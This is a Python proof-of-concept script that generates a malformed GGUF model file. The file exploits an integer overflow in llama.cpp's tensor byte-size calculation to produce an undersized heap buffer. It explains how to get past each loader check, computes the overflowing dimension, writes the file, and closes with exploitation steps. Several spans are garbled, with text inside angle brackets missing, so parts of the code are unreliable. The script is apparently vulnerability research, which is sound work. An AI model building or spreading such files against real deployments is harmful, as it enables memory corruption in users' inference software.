#!/usr/bin/env python3 """ PoC: Heap Buffer Overflow via Integer Overflow in Tensor Size Calculation Target: llama.cpp GGUF loading (ggml/src/ggml.c and ggml/src/gguf.cpp) === Vulnerability Summary === In ggml_row_size() (ggml.c:1275): size_t ggml_row_size(enum ggml_type type, int64_t ne) { return ggml_type_size(type)*ne/ggml_blck_size(type); } The multiplication `ggml_type_size(type) * ne` is performed in size_t (uint64_t) arithmetic. When type_size * ne > 2^64, this silently wraps around, producing a much smaller result than expected. The subsequent division by blck_size then yields a tiny value. This propagates to: - ggml_new_tensor_impl() (ggml.c:1686) where data_size is computed - ggml_nbytes() (ggml.c:1238) where the tensor byte size is computed - Buffer allocation and data loading code The overflow check in gguf.cpp (lines 550-552) verifies that the ELEMENT COUNT (ne[0]*ne[1]*ne[2]*ne[3]) fits in int64_t, but does NOT check that the BYTE SIZE (element_count * type_size / blck_size) fits in size_t. For quantized types where type_size > blck_size, the byte size can overflow even when the element count doesn't. The check at gguf.cpp line 589: uint64_t(ggml_nelements(&info.t)/ggml_blck_size(info.t.type)) > SIZE_MAX/ggml_type_size(info.t.type) uses ggml_nelements() which itself computes ne[0]*ne[1]*ne[2]*ne[3] in int64_t. For our chosen values, this product fits in int64_t, so ggml_nelements returns the correct value. BUT the subsequent division and comparison uses integer arithmetic that can be imprecise for values near SIZE_MAX. === Exploit Strategy === For GGML_TYPE_Q4_0: - type_size = 18 bytes (sizeof(block_q4_0) = sizeof(ggml_half) + 32/2 = 2 + 16) - blck_size = 32 We choose ne[0] such that 18 * ne[0] wraps around 2^64 to a tiny value. ne[0] = 1024819115206086208 (divisible by 32) Mathematical: 18 * ne[0] = 18446744073709551744 = 2^64 + 128 In uint64: 18 * ne[0] mod 2^64 = 128 After /32: 128 / 32 = 4 bytes (ggml_row_size returns 4!) Correct: 18 * ne[0] / 32 = 576460752303423492 bytes (~512 PB) Computed: 4 bytes Ratio: buffer is 144,115,188,075,855,873x too small! Validation bypass: - ne[0] = 1024819115206086208 < INT64_MAX (9223372036854775807) -> passes - ne[0] > 0 -> passes non-negative check - ne[0] % 32 == 0 -> passes block alignment check - ggml_nelements = ne[0] = 1024819115206086208 - nelements/32 = 32025597350190194 - SIZE_MAX/18 = 1024819115206086200 - 32025597350190194 < 1024819115206086200 -> passes byte size check (line 589)! Result: A tensor is created with ne[0] = 1024819115206086208 elements but backed by only 4-32 bytes of actual buffer. Any operation that accesses data beyond the first few bytes triggers a heap buffer overflow. === GGUF Binary Format Reference === Header: - Magic: "GGUF" (4 bytes) - Version: uint32 (3) - n_tensors: uint64 - n_kv: uint64 KV pairs: - key: string (uint64 len + chars) - type: uint32 (GGUF type enum) - value: type-dependent Tensor info (per tensor): - name: string (uint64 len + chars) - n_dims: uint32 - ne[0..n_dims-1]: int64 each - type: uint32 (ggml_type enum) - offset: uint64 Data section: aligned to ctx->alignment (default 32) """ import struct import sys import os import math # ============================================================ # GGUF constants # ============================================================ GGUF_MAGIC = b"GGUF" GGUF_VERSION = 3 # GGUF value types GGUF_TYPE_UINT8 = 0 GGUF_TYPE_INT8 = 1 GGUF_TYPE_UINT16 = 2 GGUF_TYPE_INT16 = 3 GGUF_TYPE_UINT32 = 4 GGUF_TYPE_INT32 = 5 GGUF_TYPE_FLOAT32 = 6 GGUF_TYPE_BOOL = 7 GGUF_TYPE_STRING = 8 GGUF_TYPE_ARRAY = 9 GGUF_TYPE_UINT64 = 10 GGUF_TYPE_INT64 = 11 GGUF_TYPE_FLOAT64 = 12 # ggml_type enum values GGML_TYPE_F32 = 0 GGML_TYPE_F16 = 1 GGML_TYPE_Q4_0 = 2 GGML_TYPE_Q4_1 = 3 GGML_TYPE_Q5_0 = 6 GGML_TYPE_Q5_1 = 7 GGML_TYPE_Q8_0 = 8 GGML_TYPE_I8 = 24 GGML_TYPE_I32 = 26 # Q4_0 type properties Q4_0_TYPE_SIZE = 18 # sizeof(block_q4_0) = sizeof(ggml_half) + QK4_0/2 = 2 + 16 Q4_0_BLCK_SIZE = 32 # QK4_0 INT64_MAX = (1 << 63) - 1 UINT64_MAX = (1 << 64) - 1 SIZE_MAX = UINT64_MAX # 64-bit platform GGML_DEFAULT_ALIGNMENT = 32 # ============================================================ # Helper functions # ============================================================ def write_string(f, s): """Write a GGUF string: uint64 length + chars (no null terminator)""" encoded = s.encode('utf-8') f.write(struct.pack('= 0 and ne1 >= 0 and ne2 >= 0 and ne3 >= 0 print("[PASS] All ne[j] >= 0 (non-negative check)") # Check 2: gguf.cpp line 550-552 - overflow check # INT64_MAX/ne[1] <= ne[0] -> must be FALSE to pass check1 = INT64_MAX // ne1 <= ne0 print(f" Check 1: INT64_MAX/ne[1] = {INT64_MAX // ne1} <= ne[0] = {ne0} ? {check1}") assert not check1, "Failed overflow check 1!" # INT64_MAX/ne[2] <= ne[0]*ne[1] -> must be FALSE prod01 = ne0 * ne1 # Safe in Python (arbitrary precision) assert prod01 < (1 << 63), f"ne[0]*ne[1] = {prod01} overflows int64_t!" check2 = INT64_MAX // ne2 <= prod01 print(f" Check 2: INT64_MAX/ne[2] = {INT64_MAX // ne2} <= ne[0]*ne[1] = {prod01} ? {check2}") assert not check2, "Failed overflow check 2!" # INT64_MAX/ne[3] <= ne[0]*ne[1]*ne[2] -> must be FALSE prod012 = prod01 * ne2 assert prod012 < (1 << 63), f"ne[0]*ne[1]*ne[2] = {prod012} overflows int64_t!" check3 = INT64_MAX // ne3 <= prod012 print(f" Check 3: INT64_MAX/ne[3] = {INT64_MAX // ne3} <= ne[0]*ne[1]*ne[2] = {prod012} ? {check3}") assert not check3, "Failed overflow check 3!" print("[PASS] Overflow check at gguf.cpp:550-552 bypassed") # Check 3: gguf.cpp line 580 - block alignment assert ne0 % blck_size == 0 print(f"[PASS] ne[0] % blck_size == 0 (block alignment check)") # Check 4: gguf.cpp line 589 - byte size representable nelements = ne0 * ne1 * ne2 * ne3 assert nelements < (1 << 63), "ggml_nelements overflows int64_t!" lhs = nelements // blck_size # uint64_t(ggml_nelements/blck_size) rhs = SIZE_MAX // type_size # SIZE_MAX/type_size byte_check = lhs > rhs print(f" Byte size check: nelements/blck_size = {lhs} > SIZE_MAX/type_size = {rhs} ? {byte_check}") assert not byte_check, "Failed byte size check!" print("[PASS] Byte size check at gguf.cpp:589 bypassed") # Now compute the ACTUAL overflow print(f"\n{'='*70}") print("SIZE COMPUTATION (showing the overflow)") print(f"{'='*70}") # ggml_row_size(Q4_0, ne[0]) = type_size * ne[0] / blck_size true_product = type_size * ne0 wrapped_product = true_product % (1 << 64) # uint64_t wrap row_size_overflowed = wrapped_product // blck_size row_size_correct = true_product // blck_size print(f"\nggml_row_size computation:") print(f" type_size * ne[0] = {true_product}") print(f" = 2^64 * {true_product // (1 << 64)} + {true_product % (1 << 64)}") print(f" In uint64_t (mod 2^64): {wrapped_product}") print(f" After / blck_size: {row_size_overflowed} bytes <-- OVERFLOWED!") print(f" Correct value: {row_size_correct} bytes") print(f" Overflow factor: {row_size_correct / row_size_overflowed:.0f}x too small!") # data_size computation data_size = row_size_overflowed for dim in [ne1, ne2, ne3]: if dim > 1: data_size = (data_size * dim) % (1 << 64) correct_size = row_size_correct * ne1 * ne2 * ne3 print(f"\ndata_size (ggml_new_tensor_impl):") print(f" Computed: {data_size} bytes ({data_size} B)") print(f" Correct: {correct_size} bytes ({correct_size / (1024**5):.1f} PB)") # ggml_nbytes computation # For quantized: nbytes = ne[0]*nb[0]/blck_size + sum((ne[i]-1)*nb[i]) nb0 = type_size # = 18 nb1 = type_size * (ne0 // blck_size) # This doesn't overflow because ne0/32 is reasonable nb2 = nb1 * ne1 nb3 = nb2 * ne2 # ne[0] * nb[0] overflows! ne0_nb0_true = ne0 * nb0 ne0_nb0_wrapped = ne0_nb0_true % (1 << 64) nbytes_first = ne0_nb0_wrapped // blck_size nbytes = nbytes_first if ne1 > 1: nbytes += (ne1 - 1) * nb1 if ne2 > 1: nbytes += (ne2 - 1) * nb2 if ne3 > 1: nbytes += (ne3 - 1) * nb3 nbytes_correct = correct_size print(f"\nggml_nbytes:") print(f" ne[0]*nb[0] = {ne0} * {nb0} = {ne0_nb0_true}") print(f" In uint64_t: {ne0_nb0_wrapped}") print(f" / blck_size: {nbytes_first}") print(f" + stride terms: {nbytes - nbytes_first}") print(f" Total nbytes: {nbytes} bytes") print(f" Correct value: {nbytes_correct} bytes") # What gets allocated vs what the tensor "thinks" it has padded = ((nbytes + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT print(f"\n{'='*70}") print("HEAP BUFFER OVERFLOW") print(f"{'='*70}") print(f" Buffer allocated: {padded} bytes (GGML_PAD({nbytes}, {GGML_DEFAULT_ALIGNMENT}))") print(f" Tensor logical size: {nbytes_correct} bytes") print(f" Overflow: {nbytes_correct - padded} bytes beyond allocation") print(f" Stride nb[1]: {nb1} bytes (distance between rows)") print(f" Any access to row 1+ is {nb1 - padded} bytes out of bounds!") return data_size, nbytes, padded def create_poc_gguf(output_path): """ Create a GGUF file with a tensor whose dimensions cause integer overflow in ggml_row_size(), resulting in a tiny buffer allocation for what should be an enormous tensor. """ ne0 = compute_overflow_ne0() ne1 = 1 # Keep simple - 1D tensor is enough to trigger the overflow ne2 = 1 ne3 = 1 data_size, nbytes, padded_size = verify_overflow(ne0, ne1, ne2, ne3) # ---- Build the GGUF file ---- # Metadata KV pairs needed for llama.cpp to proceed with loading kv_pairs = [] n_kv = 0 # Tensors: one tensor with overflow-inducing dimensions # Use a name that llama.cpp expects for a llama model tensor_name = "token_embd.weight" n_tensors = 1 print(f"\n{'='*70}") print("GENERATING GGUF FILE") print(f"{'='*70}") print(f" Tensor: '{tensor_name}'") print(f" Type: Q4_0 (type_size=18, blck_size=32)") print(f" Dimensions: ne[0]={ne0}") print(f" Tensor data in file: {padded_size} bytes (the overflowed/small size)") print(f" Output: {output_path}") with open(output_path, 'wb') as f: # ---- GGUF Header ---- f.write(GGUF_MAGIC) f.write(struct.pack('", "", "", "hello"] vocab_scores = [0.0, 0.0, 0.0, -1.0] vocab_types = [0, 3, 3, 1] # NORMAL=0, CONTROL=3, NORMAL=1 # Count KV pairs: 13 scalar + 3 array = 16 n_kv = 16 f.write(struct.pack(' 0: f.write(b'\x00' * padding_needed) # ---- Write tensor data ---- # Write exactly padded_size bytes of tensor data (the overflowed small amount) # In practice, filling with a recognizable pattern helps identify OOB reads tensor_data = b'\xAA' * padded_size f.write(tensor_data) file_size = os.path.getsize(output_path) print(f" File size: {file_size} bytes") print(f"\n[+] GGUF file written successfully") return output_path def main(): output_dir = "/Users/eltarne/Documents/script/gguf_poc" os.makedirs(output_dir, exist_ok=True) output_path = os.path.join(output_dir, "poc_tensor_overflow.gguf") print("=" * 70) print("PoC: Integer Overflow in Tensor Size Calculation (GGUF)") print("Target: llama.cpp ggml_row_size() / ggml_nbytes()") print("=" * 70) # Step 1: Compute the overflow-inducing dimension ne0 = compute_overflow_ne0() print(f"\n[+] Found overflow-inducing ne[0] = {ne0}") print(f" = 0x{ne0:016X}") print(f" Fits in int64_t: {ne0 < (1 << 63)}") print(f" Divisible by 32: {ne0 % 32 == 0}") # Step 2: Verify all checks are bypassed print(f"\n[+] Verifying validation bypass and computing overflow...") # Step 3: Create the GGUF file create_poc_gguf(output_path) # Step 4: Instructions print(f"\n{'='*70}") print("EXPLOITATION") print(f"{'='*70}") print(f""" When llama.cpp loads this GGUF file: 1. gguf_init_from_file() reads tensor info: - ne[0] = {ne0} - type = Q4_0 (type_size=18, blck_size=32) - All validation checks PASS (see analysis above) 2. ggml_nbytes() computes tensor size: - ne[0] * nb[0] = {ne0} * 18 = {ne0 * 18} - In uint64_t: {(ne0 * 18) % (1 << 64)} (OVERFLOWED!) - Result: {((ne0 * 18) % (1 << 64)) // 32} bytes instead of {ne0 * 18 // 32} 3. Buffer allocation uses the tiny overflowed size -> Only {(((ne0 * 18) % (1 << 64)) // 32 + 31) // 32 * 32} bytes allocated 4. Tensor metadata says ne[0]={ne0} with stride nb[1]={18 * (ne0 // 32)} -> Any access beyond first few bytes is a HEAP BUFFER OVERFLOW To test with llama-cli (demonstrates GGUF validation bypass): cd /Users/eltarne/Documents/script/llama.cpp/build/bin ./llama-cli -m {output_path} -p 'hello' 2>&1 # Note: llama-cli rejects at model-level shape check, but GGUF parsing passes To test with the C test harness (demonstrates the actual overflow): cd /Users/eltarne/Documents/script/gguf_poc ./test_tensor_overflow poc_tensor_overflow.gguf # Shows: ggml_nbytes=4 for tensor with 10^18 elements -> HEAP BUFFER OVERFLOW """) if __name__ == "__main__": main()